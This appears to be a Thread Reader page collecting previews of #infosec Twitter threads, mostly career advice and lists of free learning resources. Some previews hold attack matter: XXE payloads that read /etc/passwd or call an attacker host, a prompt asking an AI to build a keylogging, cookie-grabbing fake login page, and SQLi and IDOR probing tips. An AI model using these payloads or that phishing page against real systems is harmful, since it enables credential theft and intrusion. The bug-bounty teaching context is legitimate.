Discover and read the best of Twitter Threads about #infosec

Most recents (24)

20 FREE Cybersecurity Certifications to Add to Resume/CV
1. Introduction to Cybersecurity…
2. Computer Forensics…
Read 23 tweets
From Noob to Pentesting Clients in 2023 πŸ‘‡
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
Read 9 tweets
HTTP Parameter Pollution @SecGPT has seen in its training. Image
1. ATO via password reset

The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms

The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
Read 5 tweets
𝐌𝐚π₯𝐰𝐚𝐫𝐞 𝐚𝐧𝐝 π‘πžπ―πžπ«π¬πž π„π§π π’π§πžπžπ«π’π§π  π‚π¨π§π­πžπ§π­π¬ πŸ“’

#infosec #Hacking #redteam
#malware #ReverseEngineering

Awesome Malware and Reverse Engineering
Malware API

Malware Analysis and Reverse Engineering


Malware Bazar

Malware Analysis Journey
Read 6 tweets
πŸš€πŸ”’Exciting news! SecGPT is now LIVE!

Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.πŸ‘‡
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.

Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.

Try it out for free at

#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Read 7 tweets


Once a Device is β€˜Bluebugged’, the Hacker can access the target device, steal and modify device data, listen to calls, and read messages.

A thread
What is a Bluetooth Attack?

This is a form of Hacking Technique that allows the attacker access to a device with a Bluetooth discoverable connection or when a Bluetooth technology is left on
Types of Bluetooth Attacks

Β· Bluesnarf Attack
Β· Man-in-The Middle (MiTM) Attack
Β· BlueJacking
Β· BlueSmacking (DoS Attack)
Β· BluePrinting Attack
Β· BlueBugging
Read 7 tweets
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports. Image
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Read 7 tweets
Unlocking the Secrets: Breaking Access Controls, the basics πŸ‘‡

(from the AI model I'm currently training on security reports) Image
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Read 8 tweets
Often times to simplify my work I build scripts.πŸ‘‡

I recently discovered katana by @pdiscoveryio. And I turned this:

katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"

into this:

kata <tld>
1. The long command does the following:

-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e.
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:

kata <tld>

Do me a favor and star the repo, thanks!

#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips…
Read 3 tweets
🚨Security Career Resource Thread 🚨

1️⃣ 2️⃣ resources to break into the field or take your career to the next level πŸ‘‡

#infosec #cybersecurity #security

πŸŽ“ How to get into various fields: pentesting, SOC analyst, AppSec, ...

🎫 Certs - do they matter? For which roles?

πŸ§ͺ Doing security research

πŸ“£ Building your brand via blog posts, conference talks, and more

πŸ’Έ How to think about compensation
πŸ“Ί Launch your cybersecurity career: @IppSec's advice on how to become a skilled professional

* Technical tips
* Keeping a positive mindset
* Life is what you make it

#bugbounty #bugbountytips

Read 15 tweets
As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? πŸ‘‡
1. Inspired by @NahamSec recent video.

First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
Read 9 tweets
7 Steps to Take When Pivoting into the Cybersecurity Industry
1. Acquire the fundamental knowledge. This can be achieved via Certifications and Online Courses

2. Improve your Hands-On Skills. Experiment on onsite or offsite environments.
3. Build a great Portfolio. Work on personal and collective projects, improve your writing and documenting skills,Participate in hackathons and CTFs and so on.
Read 6 tweets
🧡Thread: "Discovering the Hidden World with Geomint"

Hey OSINT PUNKs! Are you ready to take your investigative skills to the next level? It's time to discover the hidden world with Geomint! πŸŒŽπŸ•΅οΈβ€β™‚οΈ
#OSINT #infosec #GEOMINT
So what exactly is Geomint? It's the art of using geolocation data to gather intelligence about people, places, and events. With Geomint, you can uncover valuable information that may be hidden in plain sight.
There are many tools available for Geomint, and we've compiled a list of some of the best ones to get you started:
Read 10 tweets
More practice, less theory (but not 0 theory)

In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.

My point was not understood and I got a lot of hate for it. Image
1. Again, there's less value in being Top 1% if your experience is purely theoretical.

Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.

Get your daily real-world experience from VDPs (and not paid bounties).
Read 4 tweets
In 1998, two Stanford students published "The Anatomy of a Large-Scale Hypertextual Web Search Engine," in which they wrote, "Advertising funded search engines will be inherently biased towards the advertisers and away from the needs of consumers." 1/ A modified version of Hiero...
If you'd like an essay-formatted version of this thread to read or share, here's a link to it on, my surveillance-free, ad-free, tracker-free blog:… 2/
The co-authors were Lawrence Page and Sergey Brin, and the "large-scale hypertextual web search-engine" they were describing was their new project, which they called "#Google." They were 100% correct - prescient, even! 3/
Read 62 tweets
Today marks the first anniversary of the Russia-Ukraine #cyberwar that killed <checks Microsoft's & Mandiant's reports> no one.

Let's go over last year's mass cyberwar #panic. We'll begin with one of the earliest calls to #boycott @Kaspersky:
There was an immediate feeling that everyone must cancel all Kaspersky subscriptions, as if customers -- especially corporate clients -- had a competitor's product waiting in the wings to replace it in some trivial fashion:
Likewise, there was an immediate plea to [translated] "remove Kaspersky from your PC. Now. Immediately." Again, as if customers -- especially corporate clients -- could do it trivially and without serious consequences:
Read 36 tweets
Grow your cybersecurity skills with this incredible collection of FREE learning resources.

⚑️ Get ready to level up!

Follow & share the 🧡

#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
1️⃣ Hands-on cyber security training through real-world scenarios.
2️⃣ LiveOverflow YouTube channel
Read 11 tweets
Learn Cybersecurity for FREE on YouTube.

Here are 12 pages to check out
1 Network Chuck- Everything Cybersecurity related

2 Outpost Gray- Cybersecurity Carer Dev

3 The XSS Rat- Bounty Hunting

4 Cyrill Gossi- Cryptography Videos

5 Cyberspatial- Cybersecurity Education and Training

6 Bugcrowd- Bug Bounty Interviews and Methodology
7 Professor Messer- Guides covering Certifications

8 Black Hat- Cybersecurity Technical Conferences

9 Hak5- Everything Cybersecurity

10 Infosec Institute- Cybersecurity Awareness

11 HackerSploit- Pen Test and Web App Hacking
Read 4 tweets
Looking to kickstart your career in cybersecurity?

You can do it all with FREE resources and a clear step-by-step path

Here is How 🧡

#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
1️⃣ Level - Introduction to OpenVPN

πŸ…°οΈ OpenVPN: How to Connect

-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS

The room is free complete it.πŸ‘‡
2️⃣ Introductory Research Walkthrough

Here you will learn

- How to research
- How to search for vulnerabilities

The room is free complete it.πŸ‘‡…
Read 11 tweets
XSS PoC - AI Generated:

2. Prompt w/ description
3. Export to JSFiddle
4. Host it
5. Include external script
6. Escalate your alert()

#bugbountytips #infosec #xss #ai #GPT

πŸ‘‡πŸ§΅ for Prompt & Code
My prompt:
make a fake login page that's a keylogger and grabs cookies with some styling to make it look like a real login page
Read 6 tweets
Today's quick #malware analysis with #SecurityOnion: FAKEBAT, REDLINE STEALER, and GOZI/ISFB/URSNIF pcap from 2023-02-03!

Thanks to @malware_traffic for sharing this pcap!

More screenshots:…

@malware_traffic Let's review some of the data that #SecurityOnion generates from this traffic!

When you import the pcap using so-import-pcap, it will generate a hyperlink that will take you to the Overview dashboard:
@malware_traffic Here are the NIDS alerts:
Read 13 tweets
Top IDOR ( Insecure direct object reference)
Thread 🧡:πŸ‘‡(1/12) Here is how to find IDOR all possible methods

" IDOR is a low hanging fruit which takes no skill with higher bounty" - can bypass payment , PII leak and want not 😍

#BugBounty #bugbountytips #infosec #IDOR
1) IDOR to delete images from other stores profile pic
a) facebook IDOR image delete -
b) hackerone report id -404797
2) Is the ID encoded or not in plaintext?
- change the setting of user by changing there id id on base64 H1 report id - 291721

3) Can a file/resource be accessed directly from the url, without needing prior authentication?
-H1 258260, 230870, 126861
Read 7 tweets
(1/6) To all investigators out there who have heard of #Maltego before, but still looking for more information. Here's what you need to know about Maltego πŸ‘‡ #OSINT #infosec
(2/6) #Maltego is a link analysis tool that helps you automatically pull and map data from over 70 public data sources (#OSINT) and third-party data providers, and your own imported or custom data integrations. All of this done with a few clicks on the mouse in one interface.
(3/6) You start by providing input information for your investigation (name, alias, domain, IP address, etc.), install the data integrations you want to use, and #Maltego will retrieve relevant Entities from the data integrations and visualize the data connections between them.
Read 6 tweets
More SQLi tips.

1. Append a ' or " to a valid param value.
2. If the response changes, replace the ' or " with each of these in turn (sub ' with " as needed):

' '

3. If you get the original response back, you likely have SQLi.

#bugbountytips #Cybersecurity #InfoSec
I call this the "break and repair" method. Your initial ' or " breaks the statement syntax.

The 3 values in step 2 are "repairs". They change your initial break into a valid concatenation with an empty string, which results in the original value (and response).
Once you have a potential SQLi, you can use boolean logic to confirm it.

Replace your repair with:

' AND '1'='1
' AND '1'='2

The first should get the same response as the initial (non-SQLi) value. The second should not.
Read 3 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!